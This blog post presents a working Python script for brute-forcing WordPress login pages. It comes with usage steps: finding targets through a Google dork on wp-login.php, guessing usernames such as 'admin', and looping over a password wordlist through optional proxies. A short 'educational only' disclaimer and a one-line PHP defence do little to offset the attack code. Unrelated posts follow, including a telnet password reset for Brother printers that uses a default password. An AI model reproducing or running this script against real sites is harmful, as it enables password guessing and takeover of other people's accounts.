WordPress Brute Force Attack Script

The information is to be used for educational purposes only. I’m not responsible for any misuse of this information. The following is meant to help you develop a cracking defensive attitude to prevent such attacks. In no way should you use this information to cause any kind of damage directly or indirectly.

 I started writing a Python script for brute forcing WordPress’ login page. Then I found this script by PuRiCeL.

 



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105

#!/usr/bin/python
# WordPress Brute Force (wp-login.php)
# originally from http://rstcenter.com/forum/31831-%5Bpython%5D-wordpress-brute-force.rst
# example usage: nohup python wp-brute.py <site> <user> <wordlist> -verbose&

# If cookies enabled brute force will not work (yet)
# Change response on line 97 if needed. (language)

# Dork: inurl:wp-login.php

import urllib2
import sys
import re
import urllib
import httplib
import socket


if len(sys.argv) not in [4,5,6,7]:
    print 'Usage: python wordpressbf.py <site> <user> <wordlist> <options>\n'
    print '\t   -p/-proxy <host:port> : Add proxy support'
    print '\t   -v/-verbose : Verbose Mode\n'
    sys.exit(1)

for arg in sys.argv[1:]:
    if arg.lower() == '-p' or arg.lower() == '-proxy':
        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == '-v' or arg.lower() == '-verbose':
        verbose = 1

try:
    if proxy:
        print '\n * Testing Proxy...'
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print '* Proxy:', proxy

except(socket.timeout):
    print '\n[-] Proxy Timed Out'
    proxy = 0
except(NameError):
    print '\n[-] Proxy Not Given'
    proxy = 0
except:
    print '\n[-] Proxy Failed'
    proxy = 0

try:
   if verbose == 1:
      print '* Verbose Mode On\n'

except(NameError):
    print '[-] Verbose Mode Off\n'
    verbose = 0

if sys.argv[1][:7] != 'http://':
    host = 'http://' + sys.argv[1]
else:
    host = sys.argv[1]

print '* BruteForcing:', host

print '* User:', sys.argv[2]


try:
    words = open(sys.argv[3], 'r').readlines()
    print '* Words Loaded:', len(words), '\n'

except(IOError):
    print '[-] Error: Check your wordlist path\n'
    sys.exit(1)

for word in words:
    word = word.replace('\r','').replace('\n','')
    login_form_seq = [
        ('log', sys.argv[2]),
        ('pwd', word),
        ('rememberme', 'forever'),
        ('wp-submit', 'Login >>'),
        ('redirect_to', 'wp-admin/')]
    login_form_data = urllib.urlencode(login_form_seq)
    if proxy != 0:
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        opener = urllib2.build_opener(proxy_handler)
    else:
        opener = urllib2.build_opener()
    try:
        site = opener.open(host, login_form_data).read()
    except(urllib2.URLError), msg:
        print msg
        site = ''

    if re.search('WordPress requires Cookies', site):
        print '[-] Failed: WordPress has cookies enabled\n'
        sys.exit(1)

    #Change this response if different. (language)
    if re.search('<strong>ERROR</strong>',site) and verbose == 1:
        print '[-] Login Failed:', word
    else:
        print '\n\t[!] Login Successfull:', sys.argv[2],word,'\n'
        sys.exit(1)

print '\n[-] Brute Complete\n'


And here’s an example wordlist.
Here’s how to use the script.
  1. Find the login url. It usually ends in wp-login.php. You can Google dork it with inurl:wp-login.php
  2. Guess a valid username. “admin” is a common one. Variations on the name of the webmaster might also work.
  3. Run python wp-brute.py
This brute force attack only works on self-hosted WordPress sites. Those hosted on wordpress.com will lock you out if you try too many times. Step 2 above is possible because WordPress shows different error messages for invalid usernames and invalid passwords. This basic security flaw lets crackers know what usernames are valid.
Here are ways to prevent WordPress from getting hacked:


1

add_filter('login_errors',create_function('$a', "return null;"));
More Script On  ; http://nmap.org/nsedoc/scripts/http-wordpress-brute.html

 Source: http://www.davidxia.com/2011/08/wordpress-brute-force-attack-script/

Comments

Post a Comment

Popular posts from this blog

Brother printer password reset using telnet

Image
  Login into printer using telnet. telnet 10.1.0.110 Enter default telnet password as 'access' . Press enter for the username or you can use admin or what ever username.  Type this command to reset the password SET PASSWORD abc123 New password will be abc123 .    Clear the web password of  MFC-8510DN  Note : when you change the password this will change the both web and telnet password. If you just need to reset the password enter SET PASSWORD. and hit enter key without password. That will reset the web login password and also it will automatically change the telnetpassword back to 'access'
Read more....

How to adjust the brightness in Samsung 19" SyncMaster SA100 LED monitor?

Image
METHOD ONE (I) 1. GOTO this site. http://www.samsung.com/us/consumer/learningresources/monitor/magetune/pop_download.html 2.download suitable version with our OS . me use windows7 then i choose ex :  http://www.samsung.com/us/consumer/learningresources/monitor/download/MagicTunePremium_Win7_WinVista_32bit_3.2.2.zip 3.run the program.if you are using laptop to use this LED monitor as secondary display first time this program may be not work.then drag that program into your secondary monitor display area and then click image menu. 4.Any questions please ask me. SECOND METHOD (II) Hold power button 8 - 10 seconds then monitor adjust automatically. THIRD METHOD (III) (STILL BETA VERSION RELEASED) You can download my small program [Open source] to adjust monitor brightness (dual monitor supported) from below link [Available as a source code and binary both] http://freevbs.blogspot.com/p/computer.html
Read more....

Samsung SA100 Monitor Brightness Adjustment Tool

Adjust Monitor Brightness You can download the program from the below links Monitor Brightness Controller 1.2v  (updated 08-03-2013) Monitor Brightness Type Windows Size Download .exe 32-bit x86 213 KB Download .7z 32-bit x86 14 KB You can download  the  source code  or preview online  from    Source Mirror 1   Source Mirror 2 Last Update 2013-03-06 if you are not windows 7 or vista user you must install Microsoft .net framework before run the program. it can download bellow link www. microsoft .com/en-us/ download /details.aspx?id=1639 ‎
Read more....